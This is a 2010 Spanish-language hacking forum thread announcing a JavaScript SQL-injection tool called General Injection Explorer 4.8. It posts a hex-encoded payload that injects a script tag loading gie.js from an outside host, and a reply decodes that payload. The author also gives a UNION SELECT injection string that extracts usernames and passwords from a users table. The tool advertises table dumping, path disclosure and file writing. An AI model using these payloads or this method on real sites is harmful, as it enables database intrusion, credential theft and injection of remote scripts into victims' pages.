GiE 4.8 - SQLi

Iniciado por Pony-Magic, 13 Diciembre 2010, 09:26 AM

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario

Pony-Magic

13 Diciembre 2010, 09:26 AM
General Injection Explorer 4.8
version anterior.

  • ajax peticiones con async
  • dumpea tablas en <table> y .SQL
  • full path disclosure
  • write file




    Paste2 Codigo de fuente.
    Archivo Gie.JS

    Código [Seleccionar]
    ((0x3c736372697074207372633d27687474703a2f2f6b727970746f73656375726974792e636f6d2e61722f6769652e6a73272f3e))

    -> usar ((0xCode)) en vez de (0xCode)



    @name: General Injection Explorer
    @version: 4.8
    @author: PonyMagic
    @date: 12/12/2010 - 2:51
    @contact: PonyMagic@live.com


    PD: si ni sabes como funciona, abajo del titulo podes ver el post de la versión anterior.[/b]

Darioxhcx

#1
13 Diciembre 2010, 17:31 PM
saaaaabeeeeeeeeeeeeeeeeeeeeee

Karcrack

#2
17 Diciembre 2010, 11:23 AM
Un trabajo sorprendente... pero soy incapaz de comprender como funciona... tu has programado esto en javascript... pero que es esto:
Código [Seleccionar]
((0x3c736372697074207372633d27687474703a2f2f6b727970746f73656375726974792e636f6d2e61722f6769652e6a73272f3e))
Imagino que se encarga de incluir todo el codigo desde algun lado... Podrias explicar en que consiste toda esa retahíla de opcodes?

(PGP ID)

Pony-Magic

#3
17 Diciembre 2010, 12:52 PM
Cita de: Karcrack en 17 Diciembre 2010, 11:23 AM
Un trabajo sorprendente... pero soy incapaz de comprender como funciona... tu has programado esto en javascript... pero que es esto:
Código [Seleccionar]
((0x3c736372697074207372633d27687474703a2f2f6b727970746f73656375726974792e636f6d2e61722f6769652e6a73272f3e))
Imagino que se encarga de incluir todo el codigo desde algun lado... Podrias explicar en que consiste toda esa retahíla de opcodes?


cuando unes el select en la inyección, marcas la cantidad de columnas y en una que se muestre ingresas todo ese codigo.
es un tag <script> que llama a gie.js en hexadecimal (para poder imprimirlo) y los (()) son para "dividir" la url desde el código javascript.
Luego, mediante peticiones ajax, se inyecta entre los (()) algo como esto:

.php?id=12 and 0 union all select 1,2,(( select concat(user,pass) from users limit 4,1 )),4--

En realidad, mirando el código de fuente, se puede ver que las inyecciones son un tanto mas complejas. Pero básicamente es eso.

xassiz~

#4
17 Diciembre 2010, 14:37 PM
Cita de: Karcrack en 17 Diciembre 2010, 11:23 AM
Un trabajo sorprendente... pero soy incapaz de comprender como funciona... tu has programado esto en javascript... pero que es esto:
Código [Seleccionar]
((0x3c736372697074207372633d27687474703a2f2f6b727970746f73656375726974792e636f6d2e61722f6769652e6a73272f3e))
Imagino que se encarga de incluir todo el codigo desde algun lado... Podrias explicar en que consiste toda esa retahíla de opcodes?
Código (html4strict) [Seleccionar]
<script src='http://kryptosecurity.com.ar/gie.js'/>
Imprimir
Ir Arriba Páginas1
Acciones del Usuario